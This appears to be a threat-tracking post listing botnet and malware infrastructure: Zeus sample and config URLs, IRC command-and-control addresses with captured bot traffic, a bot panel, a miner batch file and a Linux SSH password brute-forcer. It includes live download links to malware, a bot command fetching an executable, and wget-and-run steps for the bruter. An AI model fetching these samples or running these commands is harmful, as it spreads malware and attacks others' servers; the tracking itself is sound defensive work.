Zeus sample here: http://zxz666.darktech.org/zeus/builder/bot.exe
Zeus config file here: http://zxz666.darktech.org/zeus/builder/cfg2.bin
When you open zxz666.darktech.org you are redirected to vkontakte.ru, which asks for login; maybe a masking attempt, or vkontakte.ru is now used to control Zeus bots.
Zeus samples, just in case they get deleted by the hecker
hosting infos: http://whois.domaintools.com/93.80.96.91
174.59.20.100(irc botnet hosted in United States Tunkhannock Comcast Cable Communications Inc)
Remote Host Port Number
174.59.20.100 4244
JOIN #vnc# d34th
PRIVMSG #vnc# : 14,1.:[ 15,1rAGEBoT 14,1]:. 15,1 range: 59.x.x.x with 94 threads. (autorooting)
PONG irc.undernet.org
hosting infos: http://whois.domaintools.com/174.59.20.100
216.246.124.44(irc botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number
216.246.124.44 2345
NICK New[USA|00|P|41019]
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
USER XP-6548 * 0 :COMPUTERNAME
MODE New[USA|00|P|41019] -ix
JOIN #!loco!
PONG 22 MOTD
hosting infos: http://whois.domaintools.com/216.246.124.44
tool.manitam.com(irc botnet hosted in United Kingdom Redstation Limited)
Resolved : [tool.manitam.com] To [176.227.199.27]
176.227.199.27:6669
Nick: AUT|0846719
Username: ecyccmpo
Joined Channel: #ddos with Password zz
hosting infos: http://whois.domaintools.com/176.227.199.27
a.trading-network.to(Aldi bot hosted in Seychelles Ideal Solution Ltd)
Panel here: a.trading-network.to/aldi/
samples here
hosting infos: http://whois.domaintools.com/193.107.19.150
173.163.245.113(irc botnet hosted in United States Albuquerque Comcast Business Communications Llc)
C&C Server: 173.163.245.113:9090
Server Password:
Username: MEAT
Nickname: {iNF-00-DEU-XP-DELL-3588}
Channel: ##hxxp## (Password: )
Channeltopic: :.http http://67.247.34.106/02.02.exe |.scan svrsvc_KOR 50 10 0 -c
Now talking in ##hxxp##
Topic On: [ ##hxxp## ] [ .http http://67.247.34.106/02.02.exe |.scan svrsvc_KOR 50 10 0 -c ]
Topic 11 By 12: [ pe[ro ]
hosting infos: http://whois.domaintools.com/173.163.245.113
ssh bruter from Romanian hecker(hosted in home.ro)
Linux ssh password bruter from Romanian heckers
wget vladidas.home.ro/dup1.tgz
tar xzvf dup1.tgz
cd dup
chmod +x *
./screen
./start 12
Download
119.59.99.52(irc botnet hosted in Thailand Bangkok 453 Ladplacout Jorakhaebua)
Remote Host Port Number
119.59.99.52 2345
NICK New[USA|00|P|33843]
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
USER XP-7233 * 0 :COMPUTERNAME
MODE New[USA|00|P|33843] -ix
JOIN #!loco!
PONG 22 MOTD
hosting infos: http://whois.domaintools.com/119.59.99.52
sfx.dload.asia(BitMines-btc.miner.03 hosted in Germany Hetzner Online Ag)
Resolved : [sfx.dload.asia] To [176.9.42.247]
Resolved : [sfx.dload.asia] To [188.40.92.153]
Resolved : [sfx.dload.asia] To [188.40.93.82]
yz.bat:
ping -n 2 127.0.0.1
taskkill /f /im svchoost.exe
taskkill /f /im mamita.exe
taskkill /f /im x11811.exe
taskkill /f /im Winlogon2.exe
x30811.exe -a 60 -g yes -o http://sfx.dload.asia:8332/ -u redem_g -p x1x2x3x4x5 -t 2
file downloaded after login: http://sfx.dload.asia:8332/ -u
111.90.139.39(irc botnet hosted in Malaysia Johor Bahru Piradius Net)
Remote Host Port Number
111.90.139.39 1866
NICK n[USA|XP|COMPUTERNAME]fwkcgcf
USER hh "" "lol" :hh
JOIN #!h!
PONG 422
hosting infos: http://whois.domaintools.com/111.90.139.39